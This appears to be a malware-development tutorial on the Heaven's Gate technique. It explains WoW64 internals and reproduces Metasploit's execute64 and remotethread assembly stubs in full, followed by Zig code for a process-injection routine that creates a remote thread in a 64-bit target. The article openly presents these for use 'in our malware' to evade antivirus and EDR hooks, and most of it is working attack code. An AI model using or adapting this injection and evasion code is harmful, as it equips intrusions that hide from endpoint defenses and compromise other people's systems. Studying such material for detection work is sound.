Skip to content

Heaven's Gate

TL;DR

See the code example

Heaven's Gate is a technique enabling 32-bit processes, particularly within the WoW64 environment, to execute native 64-bit code. It functions by altering the Code Segment (CS) register, using value 0x23 for 32-bit mode and 0x33 for 64-bit mode. This transition is performed via a "far jump," allowing a 32-bit application to temporarily operate with 64-bit instructions and capabilities. A primary advantage of Heaven's Gate is its ability to bypass certain AV (antivirus) and EDR (Endpoint Detection and Response) hooks, as the malicious code switches to 64-bit mode and interacts directly with 64-bit ntdll.dll functions, circumventing monitoring on the 32-bit layer. Its implementation involves specialized assembly stubs to manage the mode switching and the execution of 64-bit functions.

WoW64 Architecture

Windows 32 On Windows 64 (WoW64) is a built-in translator in 64-bit Windows to "translate" the 32-bit system interrupt to 64-bit.

WoW64 Transitioning

This graph is referenced from FireEye's research in 2020. It shows that there must be 2 ntdll modules loaded in the memory (32-bit & 64-bit) of each WoW64 process. The functions in the loaded 32-bit ntdll module (as shown in the left) are the final system functions invoked by any Win32 API called by a 32-bit application running under the WoW64 architecture. However, on a native 64-bit system, 32-bit system interrupts cannot be executed directly. Therefore, the call edx instruction actually invokes the WoW64 translation layer, which translates the 32-bit system interrupt into a 64-bit system call and dispatches it to the corresponding system function in the 64-bit ntdll module (as shown on the right).

But why 64-bit system cannot understand the 32-bit system interrupt? It's because the differences between their calling conventions. For example:

  1. Data Structure Layout:

    Obviously, the same data structure layout in memory of 32-bit & 64-bit machines will be so different, therefore, WoW64 architecture should put the correct content of all of the 32-bit data structures in the parameters into the same data structure on a 64-bit machine.

  2. Parameters Addressing Issues:

    In 32-bit calling convention, the parameters should be pushed onto the stack by the sequence, however, in the 64-bit calling convention, it should be placed at r8, r9, rcx, rdx, and then placed on the stack. So, the WoW64 architecture should place the 32-bit parameters following the x64 calling convention, that way, the 64-bit system calls can get the parameters from the place they expected.

RunSimulatedCode

Every WoW64 process is actually hosting 32-bit program within a native 64-bit process, it means all the WoW64 processes initially start as a 64-bit thread that performs a series of initialization tasks. It then transitions into 32-bit mode by calling a specific function, RunSimulatedCode exported by wow64cpu.dll, before finally jumping into the entry point of 32-bit program.

RunSimulatedCode

The graph is the assembly of RunSimulatedCode generated by Binary Ninja. There's some important messages we can see through the code.

  1. It points the r12 register to address of current 64-bit TEB structure by gs:0x30.
  2. It points the r15 register to a pointer list TurboThunkDispatch in the global variables of wow64cpu.dll.
  3. In a 64-bit TEB structure, the offset +0x1488 of its base address is a 32-bit Thread Context structure. Here the function save this data into r13 register, and the structure here will be used as a snapshot of a 32-bit thread context.

For point 3, since a WoW64 process must frequently switch between 32-bit and 64-bit execution modes during runtime, each thread maintains a dedicated memory space to store its current execution context, such as instruction pointer, register states, and stack information.

The address of this context block is consistently stored at offset +0x1488 in the 64-bit TEB (Thread Environment Block). This detail is crucial and will be leveraged for exploitation later in this article.

TurboThunkDispatch

TurboThunkDispatch

We just said that TurboThunkDispatch is a list of pointers, and in this array, there're 32 different function pointers. There're 2 functions worth our attention.

  1. The CpupReturnFromSimulatedCode function serves as the first 64-bit entry point when transitioning back from 32-bit to 64-bit execution. Whenever a 32-bit program triggers a system interrupt by invoking a 32-bit system call, it enters this function exported by wow64cpu.dll. This function saves the current 32-bit thread context, then jumps to TurboDisPatchJumpAddressEnd, which in turn invokes the corresponding 64-bit ntdll function to emulate the intended system call.
  2. The first function, TurboDispatchJumpAddressEnd, is responsible for invoking the translator function Wow64SystemServiceEx, which is exported by wow64.dll, to emulate the system interrupt. After the emulation is complete, it restores the thread context from the previously saved state and returns execution to the 32-bit application's return address, allowing it to continue execution seamlessly.

Heaven's Gate

Heaven's Gate utilizes the CS (code segment) register to hold different segment selectors to let the Intel CPU switch from 32-bit mode to 64-bit mode. Different CS register value will affect Intel CPU to parse the instructions with different instructions set.

  • 0x23
    • 32-bit thread mode in WoW64 process
  • 0x33
    • Native 64-bit thread
  • 0x1B
    • Native 32-bit thread

The process will perform a far jump to 0x33 segment to execute the desired 64-bit instructions, then return to 32-bit mode by jumping back to 0x23 segment. This technique allows a 32-bit process to obtain 64-bit capabilities.

There're several advantages to use Heaven's Gate in our malware, including but not limited to the following.

  1. Run 64-bit code right through our 32-bit program by WoW64:

    Don't need a 64-bit executable or process to do 64-bit operations, we can use Heaven's Gate to do the same.

  2. Bypass some AV/EDR detections:

    Some AV/EDR will focus on hooking the 32-bit ntdll.dll since our program is 32-bit, so when we switch to 64-bit and use 64-bit ntdll.dll, it can bypass the API hooks.

Code Walkthrough

execute64.asm

To implement Heaven't Gate, we can utilize the code from Metasploit Meterpreter. The following is the execute64.asm that they provided.

;-----------------------------------------------------------------------------;
; Author: Stephen Fewer (stephen_fewer[at]harmonysecurity[dot]com)
; Compatible: Windows 7, 2008, Vista, 2003, XP
; Architecture: wow64
; Version: 1.0 (Jan 2010)
; Size: 75 bytes
; Build: >build.py executex64
;-----------------------------------------------------------------------------;

; A simple function to execute native x64 code from a wow64 (x86) process.
; Can be called from C using the following prototype:
;     typedef DWORD (WINAPI * EXECUTEX64)( X64FUNCTION pFunction, DWORD dwParameter );
; The native x64 function you specify must be in the following form (as well as being x64 code):
;     typedef BOOL (WINAPI * X64FUNCTION)( DWORD dwParameter );

; Clobbers: EAX, ECX and EDX (ala the normal stdcall calling convention)
; Un-Clobbered: EBX, ESI, EDI, ESP and EBP can be expected to remain un-clobbered.

[BITS 32]

WOW64_CODE_SEGMENT EQU 0x23
X64_CODE_SEGMENT EQU 0x33

start:
 push ebp         ; prologue, save EBP...
 mov ebp, esp       ; and create a new stack frame
 push esi        ; save the registers we shouldn't clobber
 push edi        ;
 mov esi, [ebp+8]      ; ESI = pFunction
 mov ecx, [ebp+12]      ; ECX = dwParameter
 call delta        ;
delta:
 pop eax         ;
 add eax, (native_x64-delta)    ; get the address of native_x64

 sub esp, 8        ; alloc some space on stack for far jump
 mov edx, esp       ; EDX will be pointer our far jump
 mov dword [edx+4], X64_CODE_SEGMENT  ; set the native x64 code segment
 mov dword [edx], eax     ; set the address we want to jump to (native_x64)

 call go_all_native      ; perform the transition into native x64 and return here when done.

 mov ax, ds        ; fixes an elusive bug on AMD CPUs, http://blog.rewolf.pl/blog/?p=1484
 mov ss, ax        ; found and fixed by ReWolf, incorporated by RaMMicHaeL

 add esp, (8+4+8)      ; remove the 8 bytes we allocated + the return address which was never popped off + the qword pushed from native_x64
 pop edi         ; restore the clobbered registers
 pop esi         ;
 pop ebp         ; restore EBP
 retn (4*2)        ; return to caller (cleaning up our two function params)

go_all_native:
 mov edi, [esp]       ; EDI is the wow64 return address
 jmp dword far [edx]      ; perform the far jump, which will return to the caller of go_all_native

native_x64:
[BITS 64]         ; we are now executing native x64 code...
 xor rax, rax       ; zero RAX
 push rdi        ; save RDI (EDI being our wow64 return address)
 call rsi        ; call our native x64 function (the param for our native x64 function is allready in RCX)
 pop rdi         ; restore RDI (EDI being our wow64 return address)
 push rax        ; simply push it to alloc some space
 mov dword [rsp+4], WOW64_CODE_SEGMENT ; set the wow64 code segment
 mov dword [rsp], edi     ; set the address we want to jump to (the return address from the go_all_native call)
 jmp dword far [rsp]      ; perform the far jump back to the wow64 caller...

In the start label, the function performs a function prologue to preparing the registers and the parameters to be passed to the function.

start:
 push ebp         ; prologue, save EBP...
 mov ebp, esp       ; and create a new stack frame
 push esi        ; save the registers we shouldn't clobber
 push edi        ;
 mov esi, [ebp+8]      ; ESI = pFunction
 mov ecx, [ebp+12]      ; ECX = dwParameter
 call delta        ;

It uses a common shellcode trick to obtain the current instruction pointer by calling the delta function. This call will push the address of next instruction (return address) onto the stack, then at the delta label, pop eax will get this address and saved it into the eax. This technique then effectively obtains the current memory address or instruction pointer of the shellcode, which can be used for further calculations or adjustments.

The following code is used to "calculate the address of native_x64 dynamically", the (native_x64-delta) is the offset that known in the compilation time, with the current address we get by pop eax, we can calculate the absolute address of native_x64.

 call delta        ;
delta:
 pop eax         ;
 add eax, (native_x64-delta)    ; get the address of native_x64

When it's ready to execute the native_x64 instructions, Heaven's Gate is used to switch to 64-bit mode and execute the code. This is done by setting up a far jump, which uses the following code format.

jmp segment:offset
; [edx]     = offset (low 4 bytes)
; [edx+4]   = segment selector (high 2 bytes)

So it's equals to

jmp dword far [edx]      ; perform the far jump, which will return to the caller of go_all_native

And to prepare this far jump, the code will push the offset and segment selector onto the stack, then use the far jump instruction. The go_all_native funciton will enter and execute the selected 64-bit function code with the passed arguments in 64-bit mode, which is the entry point of the Heaven's Gate.

When the 64-bit code is completed, it returns to the position where go_all_native is called. Before performing the far jump, the code will pop out the return address from stack and save it to edi, this is the technique to manually store the return address. This saved return address is later used to jump back from 64-bit mode to 32-bit mode using Heaven's Gate technique. So let's see the implementation in assembly.

X64_CODE_SEGMENT EQU 0x33
 ...
 sub esp, 8        ; alloc some space on stack for far jump
 mov edx, esp       ; EDX will be pointer our far jump
 mov dword [edx+4], X64_CODE_SEGMENT  ; set the native x64 code segment
 mov dword [edx], eax     ; set the address we want to jump to (native_x64)

 call go_all_native      ; perform the transition into native x64 and return here when done.
 ...

go_all_native:
 mov edi, [esp]       ; EDI is the wow64 return address
 jmp dword far [edx]      ; perform the far jump, which will return to the caller of go_all_native

The native_x64 code is written as 64-bit assembly to execute under 64-bit processor mode. It'll calls the specified function pointer with the given parameter s. After executing the given function pointer, it'll prepare to call another far jump to switch back to 32-bit mode. In this case, it uses 0x23 as the CS value and the WoW64 return address stored in rdi before to go back to the original 32-bit mode utilizing the Heaven's Gate technique.

WOW64_CODE_SEGMENT EQU 0x23
...
native_x64:
[BITS 64]         ; we are now executing native x64 code...
 xor rax, rax       ; zero RAX
 push rdi        ; save RDI (EDI being our wow64 return address)
 call rsi        ; call our native x64 function (the param for our native x64 function is allready in RCX)
 pop rdi         ; restore RDI (EDI being our wow64 return address)
 push rax        ; simply push it to alloc some space
 mov dword [rsp+4], WOW64_CODE_SEGMENT ; set the wow64 code segment
 mov dword [rsp], edi     ; set the address we want to jump to (the return address from the go_all_native call)
 jmp dword far [rsp]      ; perform the far jump back to the wow64 caller...

Through the execute64.asm stub, we gain a clearer understanding of how Heaven’s Gate is implemented and how it enables the execution of native 64-bit code from a WoW64 process.

remotethread.asm

In this section, we will go through the remotethread.asm stub from Metasploit Framework, which will open a remote thread on a target process in 64-bit mode. Before we start, we need to define a structure specifically for x64 environment, instead of x86, and this structure will be passed to the 64-bit function.

This structure contains the process handle, the starting address of the remote shellcode, the parameters for the shellcode, and a field to save the thread handle when the remote thread is successfully created. This structure is named WOW64CONTEXT and this is how it looks like.

pub const WOW64CONTEXT = extern struct {
    h: extern union {
        hProcess: HANDLE,
        bPadding2: [8]BYTE,
    },
    s: extern union {
        lpStartAddress: ?LPVOID,
        bPadding1: [8]BYTE,
    },
    p: extern union {
        lpParameter: ?LPVOID,
        bPadding2: [8]BYTE,
    },
    t: extern union {
        hThread: ?HANDLE,
        bPadding2: [8]BYTE,
    },
};

In the structure above, each entry is padded to 8 bytes so that there's enough space to save 64-bit addresses and the handles. The hThread is regarded as an output parameter where we can get the remote thread handle from. The assembly stub below will prepare the environment and the parameters first, then call RtlCreateUserThread function. After executing the function, the stub will check the return value to determine if the remote thread is created successfully. That function will return a boolean to indicate success or failure, if successful, a new thread will be injected into the target process in a suspended state.

;-----------------------------------------------------------------------------;
; Author: Stephen Fewer (stephen_fewer[at]harmonysecurity[dot]com)
; Compatible: Windows 7, 2008R2, 2008, 2003, XP
; Architecture: x64
; Version: 1.0 (Jan 2010)
; Size: 296 bytes
; Build: >build.py remotethread
;-----------------------------------------------------------------------------;

; Function to create a remote thread via ntdll!RtlCreateUserThread, used with the x86 executex64 stub.

; This function is in the form (where the param is a pointer to a WOW64CONTEXT):
;     typedef BOOL (WINAPI * X64FUNCTION)( DWORD dwParameter );


[BITS 64]
[ORG 0]
    cld                    ; Clear the direction flag.
    mov rsi, rcx           ; RCX is a pointer to our WOW64CONTEXT parameter
    mov rdi, rsp           ; save RSP to RDI so we can restore it later, we do this as we are going to force alignment below...
    and rsp, 0xFFFFFFFFFFFFFFF0 ; Ensure RSP is 16 byte aligned (as we originate from a wow64 (x86) process we cant guarantee alignment)
    call start             ; Call start, this pushes the address of 'api_call' onto the stack.
delta:                     ;
%include "./src/block/block_api.asm"
start:                     ;
    pop rbp                ; Pop off the address of 'api_call' for calling later.
    ; setup the parameters for RtlCreateUserThread...
    xor r9, r9             ; StackZeroBits = 0
    push r9                ; ClientID = NULL
    lea rax, [rsi+24]      ; RAX is now a pointer to ctx->t.hThread
    push rax               ; ThreadHandle = &ctx->t.hThread
    push qword [rsi+16]    ; StartParameter = ctx->p.lpParameter
    push qword [rsi+8]     ; StartAddress = ctx->s.lpStartAddress
    push r9                ; StackCommit = NULL
    push r9                ; StackReserved = NULL
    mov r8, 1              ; CreateSuspended = TRUE
    xor rdx, rdx           ; SecurityDescriptor = NULL
    mov rcx, [rsi]         ; ProcessHandle = ctx->h.hProcess
    ; perform the call to RtlCreateUserThread...
    mov r10d, 0x40A438C8   ; hash( "ntdll.dll", "RtlCreateUserThread" )
    call rbp               ; RtlCreateUserThread( ctx->h.hProcess, NULL, TRUE, 0, NULL, NULL, ctx->s.lpStartAddress, ctx->p.lpParameter, &ctx->t.hThread, NULL )
    test rax, rax          ; check the NTSTATUS return value
    jz success             ; if its zero we have successfully created the thread so we should return TRUE
    mov rax, 0             ; otherwise we should return FALSE
    jmp cleanup            ;
success:
 mov rax, 1             ; return TRUE
cleanup:
    add rsp, (32 + (8*6))  ; fix up stack (32 bytes for the single call to api_call, and 6*8 bytes for the six params we pushed).
    mov rsp, rdi           ; restore the stack
    ret                    ; and return to caller

You can read the assembly by reading the comments beside each line, since it's not so related to Heaven's Gate, I'll leave it to you to understand the code on your own.

To make this even easier to understand, the above assembly can be simplified into the following pseudo C code.

BOOL Function64( PWOW64CONTEXT ctx ) {
 if ( !NT_SUCCESS( RtlCreateUserThread( ctx->h.hProcess, NULL, TRUE, 0, NULL, NULL, ctx->s.lpStartAddress, ctx->p.lpParameter, &ctx->t.hThread, NULL ) ) ) {
  return FALSE;
 } else {
   return TRUE;
 }
}

wow64Inject

First, we’ll check the parameters are all valid.

    if (process_id == 0 or shellcode_buf == null or shellcode_len == 0) {
        return 0;
    }

After that, we'll cast the .text section code bytes to function pointers.

    fn_execute64 = @ptrCast(@alignCast(&bExecute64[0]));
    fn_function64 = @ptrCast(@alignCast(&bFunction64[0]));

Then, it’s about to get the remote process handle to get the control of it.

    process_handle = OpenProcess(PROCESS_ALL_ACCESS, FALSE, process_id);
    if (process_handle == null) {
        print("[-] OpenProcess Failed with Error: {x}\n", .{GetLastError()});
        return success;
    }

Once we get the handle, we’ll use the is_process_wow64 function to check the conditions to use Heaven’s Gate.

    if (isProcessWow64(GetCurrentProcess()) == 0) {
        print("[-] Current process is not a Wow64 process\n", .{});
        if (process_handle) |handle| {
            _ = CloseHandle(handle);
        }
        return success;
    } else {
        print("[*] Current process is Wow64\n", .{});
    }

    if (isProcessWow64(process_handle.?) != 0) {
        print("[-] Remote process {d} is a Wow64 process\n", .{process_id});
        if (process_handle) |handle| {
            _ = CloseHandle(handle);
        }
        return success;
    }

Next, we need to allocate a executable memory in the remote process and write the shellcode into it.

    virtual_memory = VirtualAllocEx(process_handle.?, null, shellcode_len, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    if (virtual_memory == null) {
        print("[-] VirtualAllocEx Failed with Error: {d}\n", .{GetLastError()});
        if (process_handle) |handle| {
            _ = CloseHandle(handle);
        }
        return success;
    }

Now, we can prepare the WoW64 context and perfom the Heaven’s Gate injection.

    wow64_ctx.h.hProcess = process_handle.?;
    wow64_ctx.s.lpStartAddress = virtual_memory;
    wow64_ctx.p.lpParameter = null;
    // hThread is already zeroed from std.mem.zeroes

    print("[*] About to execute Heaven's Gate transition...\n", .{});

    // switch the processor to be 64-bit mode and execute
    // the 64-bit code stub that will create a remote thread
    // in the remote 64-bit process
    const result = fn_execute64(fn_function64, @ptrCast(&wow64_ctx));
    print("[*] Heaven's Gate transition completed, result: {d}\n", .{result});

    if (result == 0) {
        print("[-] Failed to switch processor context and execute 64-bit stub\n", .{});
        if (process_handle) |handle| {
            _ = CloseHandle(handle);
        }
        return success;
    }

    if (@intFromPtr(wow64_ctx.t.hThread) == 0) { // If thread handle is null
        print("[-] Failed to create remote thread under 64-bit mode\n", .{});
        if (process_handle) |handle| {
            _ = CloseHandle(handle);
        }
        return success;
    }

Finally, we need to resume the suspended thread and clean up the handle.

    if (ResumeThread(wow64_ctx.t.hThread) == 0) {
        print("[-] ResumeThread Failed with Error: {d}\n", .{GetLastError()});
        if (process_handle) |handle| {
            _ = CloseHandle(handle);
        }
        return success;
    }

    print("[+] Successfully injected thread ({x})\n", .{@intFromPtr(wow64_ctx.t.hThread)});

    success = 1;

    // Cleanup
    if (process_handle) |handle| {
        _ = CloseHandle(handle);
    }

    return success;